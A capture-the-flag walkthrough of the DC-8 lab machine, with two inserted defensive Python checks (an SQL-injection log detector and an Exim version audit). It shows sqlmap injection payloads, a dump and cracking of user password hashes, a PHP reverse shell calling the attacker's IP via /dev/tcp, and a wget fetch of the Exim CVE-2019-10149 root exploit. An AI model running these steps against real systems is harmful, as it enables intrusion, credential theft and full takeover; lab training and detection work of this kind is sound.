Information collection
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.155.53 1a:ca:aa:46:d5:7f (Unknown: locally administered)
192.168.155.207 08:00:27:45:85:d6 PCS Systemtechnik GmbH
192.168.155.227 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.024 seconds (126.48 hosts/sec). 3 responded
┌──(root㉿anla)-[~]
└─# nmap 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.000046s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
┌──(root㉿anla)-[~]
└─# nmap -T4 -p- -A 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.155.207
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
└─# whatweb http://192.168.155.207/
http://192.168.155.207/ [200 OK] Apache, Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Apache], IP[192.168.155.207], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Script[text/javascript], Title[Welcome to DC-8 | DC-8], UncommonHeaders[x-content-type-options,x-generator,link], X-Frame-Options[SAMEORIGIN]
└─# dirsearch -u http://192.168.155.207/ | grep "200"
200 33KB http://192.168.155.207/CHANGELOG.txt
200 769B http://192.168.155.207/COPYRIGHT.txt
200 1KB http://192.168.155.207/install.php
200 868B http://192.168.155.207/INSTALL.mysql.txt
200 1KB http://192.168.155.207/install.php?profile=default
200 6KB http://192.168.155.207/INSTALL.txt
200 842B http://192.168.155.207/INSTALL.pgsql.txt
200 7KB http://192.168.155.207/LICENSE.txt
200 2KB http://192.168.155.207/MAINTAINERS.txt
200 2KB http://192.168.155.207/node
200 2KB http://192.168.155.207/README.txt
200 744B http://192.168.155.207/robots.txt
200 0B http://192.168.155.207/sites/example.sites.php
200 715B http://192.168.155.207/sites/all/modules/README.txt
200 431B http://192.168.155.207/sites/README.txt
200 545B http://192.168.155.207/sites/all/themes/README.txt
200 129B http://192.168.155.207/sites/all/libraries/README.txt
200 3KB http://192.168.155.207/UPGRADE.txt
200 2KB http://192.168.155.207/user
200 2KB http://192.168.155.207/user/
200 2KB http://192.168.155.207/user/login/
200 177B http://192.168.155.207/views/ajax/autocomplete/user/a
200 2KB http://192.168.155.207/web.config
200 42B http://192.168.155.207/xmlrpc.php
Penetration
1. Obtaining usernames and passwords with sqlmap
While clicking around the home page, a URL with a likely injection point turned up: http://192.168.155.207/?nid=1. Try sqlmap against it:
└─# sqlmap -u http://192.168.155.207/?nid=1
……
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1 AND 5794=5794
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=1 AND (SELECT 2533 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2533=2533,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=1 AND (SELECT 7774 FROM (SELECT(SLEEP(5)))IWeE)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-1943 UNION ALL SELECT CONCAT(0x717a706a71,0x6b5a755051747278644c705a59684f736b464e7a6a44454f776959527776796a6242614e446d7476,0x716a6b6271)-- -
---
[23:38:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:38:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[23:38:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.155.207'
[*] ending @ 23:38:13 /2024-04-26/
# Confirms the nid parameter is injectable
Enumeration
databases
available databases [2]:
[*] d7db
[*] information_schema
tables
Database: d7db
[88 tables]
+-----------------------------+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
columns
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| data | longblob |
| language | varchar(12) |
| name | varchar(60) |
| status | tinyint(4) |
| access | int(11) |
| created | int(11) |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
pass
Database: d7db
Table: users
[3 entries]
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| uid | name | login | mail | pass |
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| 0 | <blank> | 0 | <blank> | <blank> |
| 1 | admin | 1567766626 | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2 | john | 1567497783 | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+------------+-----------------------+---------------------------------------------------------+
# Final command
└─# sqlmap -u http://192.168.155.207/?nid=1 -D d7db -T users -C uid,name,login,mail,pass --dump
Crack the password hashes from the database
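A defender-side check added here, not part of the original writeup: it runs simple SQL-injection detection over constructed Apache access-log lines modelled on the sqlmap payloads reported above (the log lines, the sqlmap/1.8 User-Agent value and the rule names are assumptions, not data from DC-8).

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not captured from DC-8) modelled on the
# sqlmap payloads the writeup reports against the nid parameter.
SAMPLE_LOG = """\
192.168.155.245 - - [26/Apr/2024:23:37:52 -0400] "GET /?nid=1 HTTP/1.1" 200 2104 "-" "Mozilla/5.0"
192.168.155.245 - - [26/Apr/2024:23:37:53 -0400] "GET /?nid=1%20AND%205794%3D5794 HTTP/1.1" 200 2104 "-" "sqlmap/1.8"
192.168.155.245 - - [26/Apr/2024:23:37:54 -0400] "GET /?nid=1%20AND%20%28SELECT%207774%20FROM%20%28SELECT%28SLEEP%285%29%29%29IWeE%29 HTTP/1.1" 500 512 "-" "sqlmap/1.8"
192.168.155.245 - - [26/Apr/2024:23:37:55 -0400] "GET /?nid=-1943%20UNION%20ALL%20SELECT%20CONCAT%280x717a706a71%2C0x6b5a%2C0x716a6b6271%29--%20- HTTP/1.1" 200 1987 "-" "sqlmap/1.8"
192.168.155.245 - - [26/Apr/2024:23:38:01 -0400] "GET /user/login/ HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# One rule per technique sqlmap reported: boolean tautology, SLEEP-based timing,
# UNION injection, and the long hex literals sqlmap uses as output markers.
SQLI_RULES = [
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("hex-marker", re.compile(r"0x[0-9a-f]{8,}", re.I)),
]

def classify(line):
    """Return (ip, status, matched rule names) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))  # payloads arrive URL-encoded
    hits = [name for name, rx in SQLI_RULES if rx.search(decoded)]
    return m.group("ip"), int(m.group("status")), hits

def scan(log_text):
    """Per source IP: injection-tagged request count, HTTP 500 count, techniques seen."""
    report = {}
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed is None:
            continue
        ip, status, hits = parsed
        entry = report.setdefault(ip, {"sqli_requests": 0, "errors_500": 0, "techniques": set()})
        if hits:
            entry["sqli_requests"] += 1
            entry["techniques"].update(hits)
        if status == 500:  # the writeup's sqlmap run produced 25 of these
            entry["errors_500"] += 1
    return report
```

A burst of 500s from one client alongside tagged requests is the pattern to alert on; the run above logged 25 of them in under a minute.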
└─# cat DC_8_passwd.txt
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
└─# john DC_8_passwd.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
turtle (?)
Proceeding with incremental:ASCII
1g 0:00:27:13 3/3 0.000612g/s 1235p/s 1236c/s 1236C/s lj0803..lj082a
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
# Ran for quite a while and only recovered one password: turtle
Log in on the web (http://192.168.155.207/user/login/); logging in with the username john succeeds.
2. Reverse shell via the web application
After clicking around, under Find content -> WEBFORMS -> Components (Contact Us) -> Form settings -> Text format the format can be changed to PHP code. Writing <?php phpinfo(); ?> into the Confirmation message, clicking Save below, and submitting the Contact form once displays the phpinfo page.
Next, write PHP code for a reverse shell:
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.155.245/1234 0>&1'");?>
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.207: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.207] 42840
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
3. Privilege escalation via SUID
Enumerate SUID binaries:
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
Use searchsploit to look for exploitable vulnerabilities:
└─# searchsploit exim --id # show EDB-IDs instead of paths
---------------------------------------------- ---------------------------------
Exploit Title | EDB-ID
---------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote C | 25297
Exim - 'GHOST' glibc gethostbyname Buffer Ove | 36421
Exim - 'perl_startup' Local Privilege Escalat | 39702
Exim - 'sender_address' Remote Code Execution | 25970
Exim 3.x - Format String | 20900
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Priv | 40054
Exim 4.41 - 'dns_build_reverse' Local Buffer | 756
Exim 4.41 - 'dns_build_reverse' Local Read Em | 1009
Exim 4.42 - Local Privilege Escalation | 796
Exim 4.43 - 'auth_spa_server()' Remote | 812
Exim 4.63 - Remote Command Execution | 15725
Exim 4.84-3 - Local Privilege Escalation | 39535
Exim 4.87 - 4.91 - Local Privilege Escalation | 46996
Exim 4.87 / 4.91 - Local Privilege Escalation | 47307
Exim 4.87 < 4.91 - (Local / Remote) Command E | 46974
Exim 4.89 - 'BDAT' Denial of Service | 43184
exim 4.90 - Remote Code Execution | 45671
Exim < 4.86.2 - Local Privilege Escalation | 39549
Exim < 4.90.1 - 'base64d' Remote Code Executi | 44571
Exim Buffer 1.6.2/1.6.51 - Local Overflow | 20333
Exim ESMTP 4.80 - glibc gethostbyname Denial | 35951
Exim Internet Mailer 3.35/3.36/4.10 - Format | 22066
Exim Sender 3.35 - Verification Remote Stack | 24093
Exim4 < 4.69 - string_format Function Heap Bu | 16925
PHPMailer < 5.2.20 with Exim MTA - Remote Cod | 42221
---------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿anla)-[~]
└─# searchsploit -p 46996 # view details by id
Exploit: Exim 4.87 - 4.91 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/46996
Path: /usr/share/exploitdb/exploits/linux/local/46996.sh
Codes: CVE-2019-10149
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
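A defender-side audit check added here, not part of the original writeup or the exploit: it parses `exim4 --version` output the way shown above and flags a setuid-root binary whose upstream version falls in the 4.87 - 4.91 range that searchsploit lists for EDB-ID 46996 / CVE-2019-10149 (the sample banner is constructed from the writeup's output; the function names and the binary path default are assumptions).

```python
import os
import re
import stat
import subprocess

# Range from the searchsploit entry the writeup selects (EDB-ID 46996, CVE-2019-10149):
# "Exim 4.87 - 4.91 - Local Privilege Escalation".
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)

VERSION_RE = re.compile(r"^Exim version (\d+)\.(\d+)", re.M)

# Constructed banner in the form of the writeup's `exim4 --version` output, for offline use.
SAMPLE_BANNER = (
    "Exim version 4.89 #2 built 14-Jun-2017 05:03:07\n"
    "Copyright (c) University of Cambridge, 1995 - 2017\n"
)

def parse_exim_version(banner):
    """Extract (major, minor) from `exim --version` output; None if absent."""
    m = VERSION_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None

def in_affected_range(version):
    """True when the upstream version falls inside the advisory's range."""
    return version is not None and AFFECTED_MIN <= version <= AFFECTED_MAX

def is_setuid_root(path):
    """True if path exists, is owned by uid 0 and carries the setuid bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)

def audit_exim(binary="/usr/sbin/exim4", banner=None):
    """Combine the two conditions seen on DC-8: a setuid-root exim and an affected version.
    Pass banner= to skip running the binary (offline or in a test)."""
    if banner is None:
        try:
            banner = subprocess.run([binary, "--version"], capture_output=True,
                                    text=True, timeout=10).stdout
        except (OSError, subprocess.SubprocessError):
            banner = ""
    version = parse_exim_version(banner)
    setuid = is_setuid_root(binary)
    affected = in_affected_range(version)
    return {"version": version, "setuid_root": setuid,
            "version_affected": affected, "at_risk": setuid and affected}
```

Debian backports security fixes without changing the upstream version string, so a range match is a prompt to check the package changelog and patch level, not a final verdict.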
Looking at 46996.sh, its header says the script should be uploaded to the target machine and describes two privilege escalation methods; the second one is used here.
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
Start a temporary web server on the attacking machine:
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./
└─# python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Fetch the exploit script on the target machine:
www-data@dc-8:/$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:39:39-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
46996.sh: Permission denied
Cannot write to '46996.sh' (Permission denied). # no write permission in the current directory...
www-data@dc-8:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-8:/$ cd tmp
cd tmp
www-data@dc-8:/tmp$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:40:15-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'
46996.sh 100%[===================>] 3.47K --.-KB/s in 0s
2024-04-27 21:40:15 (790 MB/s) - '46996.sh' saved [3552/3552]
www-data@dc-8:/tmp$ ls
ls
46996.sh
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
Run it to obtain root:
$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 27 Apr 2024 21:52:39 +1000
250 dc-8 Hello ip6-localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1s0gbf-0000JM-FP
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.